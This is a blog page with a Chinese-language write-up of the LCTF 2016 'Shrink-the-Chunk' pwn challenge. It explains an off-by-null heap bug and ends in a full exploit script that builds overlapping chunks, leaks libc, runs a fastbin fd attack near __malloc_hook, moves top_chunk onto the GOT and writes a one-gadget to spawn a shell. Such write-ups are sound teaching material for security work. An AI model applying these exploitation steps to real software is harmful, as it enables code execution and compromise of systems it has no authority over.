<!DOCTYPE html>
<html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <meta name="description" content="我们的征途是星辰大海">
  <meta name="keyword" content="hexo-theme, vuejs">
  
    <link rel="shortcut icon" href="/css/images/logo.png">
  
  <title>
    
      LCTF 2016 Shrink-the-Chunk Writeup | 星博‘s
    
  </title>
  <link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
  <link href="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.css" rel="stylesheet">
  <link href="//cdn.bootcss.com/highlight.js/9.12.0/styles/tomorrow.min.css" rel="stylesheet">
  <link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="/css/plugins/gitment.css">
  <script src="//cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
  <script src="//cdn.bootcss.com/geopattern/1.2.3/js/geopattern.min.js"></script>
  <script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>
  <script src="/js/qrious.js"></script>
<script src="/js/gitment.js"></script>
  
  
    <!-- MathJax support START -->
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
    <!-- MathJax support END -->
  


</head>
<div class="wechat-share">
  <img src="/css/images/logo.png" />
</div>

  <body>
    <header class="header fixed-header">
  <div class="header-container">
    <a class="home-link" href="/">
      <div class="logo"></div>
      <span>星博‘s</span>
    </a>
    <ul class="right-list">
      
        <li class="list-item">
          
            <a href="/" class="item-link">Home</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/tags/" class="item-link">Tags</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/archives/" class="item-link">Archives</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/about/" class="item-link">About</a>
          
        </li>
      
    </ul>
    <div class="menu">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </div>
    <div class="menu-mask">
      <ul class="menu-list">
        
          <li class="menu-item">
            
              <a href="/" class="menu-link">Home</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/tags/" class="menu-link">Tags</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/archives/" class="menu-link">Archives</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/about/" class="menu-link">About</a>
            
          </li>
        
      </ul>
    </div>
  </div>
</header>

    <div id="article-banner">
  <h2>LCTF 2016 Shrink-the-Chunk Writeup</h2>
  <p class="post-date">2016-12-27</p>
  <div class="arrow-down">
    <a href="javascript:;"></a>
  </div>
</div>
<main class="app-body flex-box">
  <!-- Article START -->
  <article class="post-article">
    <section class="markdown-content"><blockquote>
<p>这是一篇测试博客。</p>
</blockquote>
<p>XDCTF是国内比较经典的一个CTF了，今年改成LCTF，中间发生的一些剧情也是令人唏嘘啊…</p>
<p>那首先来看这个题目吧，这题综合考察了heap内存管理，shrink the trunk，fastbin corruption， magic alloc和onegadget，还是比较复杂的。</p>
<hr>
<h2 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h2><p>首先，题目的结构大概如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sender</span><br><span class="line">    recver</span><br><span class="line">        package package package</span><br></pre></td></tr></table></figure></p>
<p>一个bss总指针带出来三条线负责管理。<br>首先要有一个sender，然后用sender可以去新建recver，新建完之后，可以新建package挂在sender上面，每个结构都是通过链表来表示，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">00000000 package_node    struc ; (sizeof=0x20, mappedto_3)</span><br><span class="line">00000000 next            dq ?                    ; offset</span><br><span class="line">00000008 prev            dq ?                    ; offset</span><br><span class="line">00000010 size            dq ?</span><br><span class="line">00000018 contant         dq ?</span><br></pre></td></tr></table></figure></p>
<p>但总结来看，就是提供了一个malloc与free 的接口，malloc的大小小于0x208，然后show是用%s输出。</p>
<h2 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h2><p>输入函数的off-by-null。这个函数第一次看竟然放过去了。</p>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p>根据前面分析的条件，利用可以通过shrink the trunk进行。</p>
<p>其中要注意的是大小，原理是通过修改free small trunk的size字段，使再分配时对下一块prev size和prez inuse的修改无效。那如果再对下一块进行释放，仍然会通过prev size prev inuse进行合并操作，从而造成中间再分配的chunk被大块包含在内。</p>
<p>接下来，可以通过fastbin fd attack进行，前提是leak。<br>我们通过修改链表指针达到leak libc的效果。接下来重来一遍，进行fd attack。</p>
<p>这个fd attack要绕过检查，只能使用上一个字是0x0000的0x7fxxxx的地址进行。假设0x7fff地址是addr，则我们需要输入addr-0x3-0x8才能达到使用效果。</p>
<p>那么问题又来了，因为这里题目会在新分配的块写上0x18的东西，相当于后面的0x18之后才能覆盖，寻找malloc_hook, free_hook, got_table均不行。</p>
<p>随便在附近看看，发现其实malloc_hook hijack后面正好有top_chunk的位置，而且好险可以写低5个字节。</p>
<p>进行尝试，发现main_arena前面flags，虽然覆盖了但是影响不大，我们控制top_chunk到got_table的位置，成功分配了gottable上面。然后里面的函数覆盖为onegadget，才最终弹出shell。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">init()</span><br><span class="line">set_sender()</span><br><span class="line">to_recv_loop()</span><br><span class="line">set_recver() #test for off-by-one shrink the chunk to get overlaped chunk</span><br><span class="line">set_package(0x10,&apos;a&apos; * 0x8 + &apos;\n&apos;) #get 0x30 space</span><br><span class="line">set_package(0x1f0,&apos;b&apos;*0x8 + &apos;\n&apos;) #get 0x210 space</span><br><span class="line">set_package(0x100,&apos;c&apos;*0x8 + &apos;\n&apos;) #get 0x120 space</span><br><span class="line">set_package(0x1f0,&apos;z&apos;*0x8 + &apos;\n&apos;)</span><br><span class="line"></span><br><span class="line">del_package(3) #free 0x210</span><br><span class="line">del_package(0) #free 0x30</span><br><span class="line"></span><br><span class="line">set_package(0x10,&apos;a&apos; * 0x10 + &apos;\n&apos;) #get 0x30 and change 0x210 -&gt; 0x200</span><br><span class="line">set_package(0xf0,&apos;e&apos;*0x8 + &apos;\n&apos;) #get 0x110 from unsorted chunk</span><br><span class="line">set_package(0x10,&apos;f&apos;*0x8 + &apos;\n&apos;) #get 0x30 from unsorted chunk, our target chunk</span><br><span class="line"></span><br><span class="line">del_package(2) #free 0x110</span><br><span class="line">del_package(2) #free 0x120 and get 0x120 + 0x210 space</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">link_header = 0x6030B8</span><br><span class="line">show_target = 0x603090 #stdout / stdin to leak libc</span><br><span class="line"></span><br><span class="line">payload1 = &apos;g&apos; * 0xf8 + p64(show_target) + &apos;\n&apos; #over write 0x110 | 0x30 here</span><br><span class="line">set_package(0x1f0,payload1) #get 0x210 space and contain the &apos;f&apos; 0x30 chunk</span><br><span class="line">data =show_package()</span><br><span class="line">t = data[data.rfind(&quot;length:&quot;):]</span><br><span class="line">leak_stdout = int(t[7:t.find(&apos;\tcontent:&apos;)],10)</span><br><span class="line">leak_libc = leak_stdout - offset__IO_2_1_stdout_</span><br><span class="line">malloc_hook_libc = leak_libc + offset___malloc_hook</span><br><span class="line">onegadget_libc = leak_libc + off_onegadget</span><br><span class="line">target = malloc_hook_libc - 0x3 - 0x8#prev 0x7f and -0x3, chunk ptr -0x8</span><br><span class="line">print &quot;leak_libc: &quot;,hex(leak_libc)</span><br><span class="line">print &quot;malloc_hook_libc: &quot;,hex(malloc_hook_libc)</span><br><span class="line">print &quot;onegadget_libc: &quot;, hex(onegadget_libc)</span><br><span class="line">print &quot;target: &quot;,hex(target)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">set_package(0x100,&apos;h&apos;*0x8 + &apos;\n&apos;) #get 0x120 chunk and leave</span><br><span class="line">back_send_loop()</span><br><span class="line">back_loop()</span><br><span class="line">init()</span><br><span class="line"></span><br><span class="line">set_sender()</span><br><span class="line">to_recv_loop()</span><br><span class="line">set_recver() #then use fastbin fd attack, attention we need 0x70 chunk and overwrite it with onegadget</span><br><span class="line">set_package(0x10,&apos;a&apos; * 0x8 + &apos;\n&apos;) #get 0x30 space</span><br><span class="line">set_package(0x1f0,&apos;b&apos;*0x8 + &apos;\n&apos;) #get 0x210 space</span><br><span class="line">set_package(0x100,&apos;c&apos;*0x8 + &apos;\n&apos;) #get 0x120 space</span><br><span class="line">set_package(0x1f0,&apos;z&apos;*0x8 + &apos;\n&apos;)</span><br><span class="line"></span><br><span class="line">del_package(3) #free 0x210</span><br><span class="line">del_package(0) #free 0x30</span><br><span class="line"></span><br><span class="line">set_package(0x10,&apos;a&apos; * 0x10 + &apos;\n&apos;) #get 0x30 and change 0x210 -&gt; 0x200</span><br><span class="line">set_package(0xf0,&apos;e&apos;*0x8 + &apos;\n&apos;) #get 0x110 from unsorted chunk</span><br><span class="line">set_package(0x50,&apos;f&apos;*0x8 + &apos;\n&apos;) #get 0x70 from unsorted chunk, our target chunk</span><br><span class="line"></span><br><span class="line">del_package(2) #free 0x110</span><br><span class="line">del_package(2) #free 0x120 and get 0x120 + 0x210 space</span><br><span class="line">del_package(1) #free 0x70 &apos;f&apos; chunk</span><br><span class="line">payload2 = &apos;g&apos; * 0xe8 + p64(0x110) + p64(0x70) + p64(target)[:-1] + &apos;\n&apos; #over write 0x110 | 0x30 here</span><br><span class="line">set_package(0x1f0,payload2) #get 0x210 space and contain the &apos;f&apos; 0x30 chunk</span><br><span class="line">set_package(0x50,&apos;h&apos; * 0x8 + &apos;\n&apos;) #get 0x70 &apos;f&apos; chunk and turn to &apos;h&apos;</span><br><span class="line">attach()</span><br><span class="line">back_send_loop()</span><br><span class="line">to_recv_loop()</span><br><span class="line">set_recver()</span><br><span class="line"></span><br><span class="line">payload3 = &apos;\x00&apos;*0x4b + &quot;\xf8\x2f\x60&quot; + &apos;\n&apos;</span><br><span class="line">set_package(0x50,payload3)#get malloc_hook_chunk and set top_chunk to 0x602ff8</span><br><span class="line">payload4 = p64(onegadget_libc) + p64(onegadget_libc) + &apos;\n&apos;</span><br><span class="line">set_package(0x1f0,payload4)</span><br><span class="line">cv(&quot;your choice : &quot;)</span><br><span class="line">sd(&quot;y&quot;)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
</section>
    <!-- Tags START -->
    
      <div class="tags">
        <span>Tags:</span>
        
  <a href="/tags#Pwn" >
    <span class="tag-code">Pwn</span>
  </a>

  <a href="/tags#CTF" >
    <span class="tag-code">CTF</span>
  </a>

      </div>
    
    <!-- Tags END -->
    <!-- NAV START -->
    
  <div class="nav-container">
    <!-- reverse left and right to put prev and next in a more logic postition -->
    
    
      <a class="nav-right" href="/2017/08/14/Writeup/">
        
          Pwnhub 线下沙龙CTF之cLEMENCy题解
        
        <span class="nav-arrow"> →</span>
      </a>
    
  </div>

    <!-- NAV END -->
    <!-- 打赏 START -->
    
    <!-- 打赏 END -->
    <!-- 二维码 START -->
    
      <div class="qrcode">
        <canvas id="share-qrcode"></canvas>
        <p class="notice">扫描二维码，分享此文章</p>
      </div>
    
    <!-- 二维码 END -->
    
      <!-- UY START -->
      <div id="uyan_frame"></div>
      <script type="text/javascript" src="http://v2.uyan.cc/code/uyan.js"></script>
      <!-- UY END -->
    
  </article>
  <!-- Article END -->
  <!-- Catalog START -->
  
    <aside class="catalog-container">
  <div class="toc-main">
    <strong class="toc-title">Catalog</strong>
    
      <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#题目分析"><span class="toc-nav-text">题目分析</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#漏洞"><span class="toc-nav-text">漏洞</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#利用"><span class="toc-nav-text">利用</span></a></li></ol>
    
  </div>
</aside>
  
  <!-- Catalog END -->
</main>

<script>
  (function () {
    var url = 'https://windcarp.github.io/2016/12/27/Test-Blog/';
    var banner = 'undefined'
    if (banner !== '' && banner !== 'undefined' && banner !== 'null') {
      $('#article-banner').css({
        'background-image': 'url(' + banner + ')'
      })
    } else {
      $('#article-banner').geopattern(url)
    }
    $('.header').removeClass('fixed-header')

     // error image
    $(".markdown-content img").on('error', function() {
      $(this).attr('src', 'http://file.muyutech.com/error-img.png')
      $(this).css({
        'cursor': 'default'
      })
    })

    // zoom image
    $(".markdown-content img").on('click', function() {
      var src = $(this).attr('src')
      if (src !== 'http://file.muyutech.com/error-img.png') {
        var imageW = $(this).width()
        var imageH = $(this).height()
        
        var zoom = ($(window).width() * 0.95 / imageW).toFixed(2)
        zoom = zoom < 1 ? 1 : zoom
        zoom = zoom > 2 ? 2 : zoom
        var transY = (($(window).height() - imageH) / 2).toFixed(2)

        $('body').append('<div class="image-view-wrap"><div class="image-view-inner"><img src="'+ src +'" /></div></div>')
        $('.image-view-wrap').addClass('wrap-active')
        $('.image-view-wrap img').css({
          'width': `${imageW}`,
          'transform': `translate3d(0, ${transY}px, 0) scale3d(${zoom}, ${zoom}, 1)`
        })
        $('html').css('overflow', 'hidden')

        $('.image-view-wrap').on('click', function() {
          $(this).remove()
          $('html').attr('style', '')
        })
      }
    })

    // qrcode
    var qr = new QRious({
      element: document.getElementById('share-qrcode'),
      value: document.location.href
    });

    // gitment
    var gitmentConfig = "undefined";
    if (gitmentConfig !== 'undefined') {
      var gitment = new Gitment({
        id: "LCTF 2016 Shrink-the-Chunk Writeup",
        owner: "undefined",
        repo: "undefined",
        oauth: {
          client_id: "undefined",
          client_secret: "undefined"
        },
        theme: {
          render(state, instance) {
            const container = document.createElement('div')
            container.lang = "en-US"
            container.className = 'gitment-container gitment-root-container'
            container.appendChild(instance.renderHeader(state, instance))
            container.appendChild(instance.renderEditor(state, instance))
            container.appendChild(instance.renderComments(state, instance))
            container.appendChild(instance.renderFooter(state, instance))
            return container;
          }
        }
      })
      gitment.render(document.getElementById('comments'))
    }
  })();
</script>

    <div class="scroll-top">
  <span class="arrow-icon"></span>
</div>
    <footer class="app-footer">
  <p class="copyright">
    &copy; 2018 | Proudly powered by <a href="https://hexo.io" target="_blank">Hexo</a>
    <br>
    Theme by <a href="https://github.com/yanm1ng">yanm1ng</a>
  </p>
</footer>

<script>
  function async(u, c) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }
</script>
<script>
  async("//cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function(){
    FastClick.attach(document.body);
  })
</script>

<script>
  var hasLine = 'true';
  async("//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js", function(){
    $('figure pre').each(function(i, block) {
      var figure = $(this).parents('figure');
      if (hasLine === 'false') {
        figure.find('.gutter').hide();
      }
      var lang = figure.attr('class').split(' ')[1] || 'code';
      var codeHtml = $(this).html();
      var codeTag = document.createElement('code');
      codeTag.className = lang;
      codeTag.innerHTML = codeHtml;
      $(this).attr('class', '').empty().html(codeTag);
      figure.attr('data-lang', lang.toUpperCase());
      hljs.highlightBlock(block);
    });
  })
</script>
<!-- Baidu Tongji -->

<script src="/js/script.js"></script>
  </body>
</html>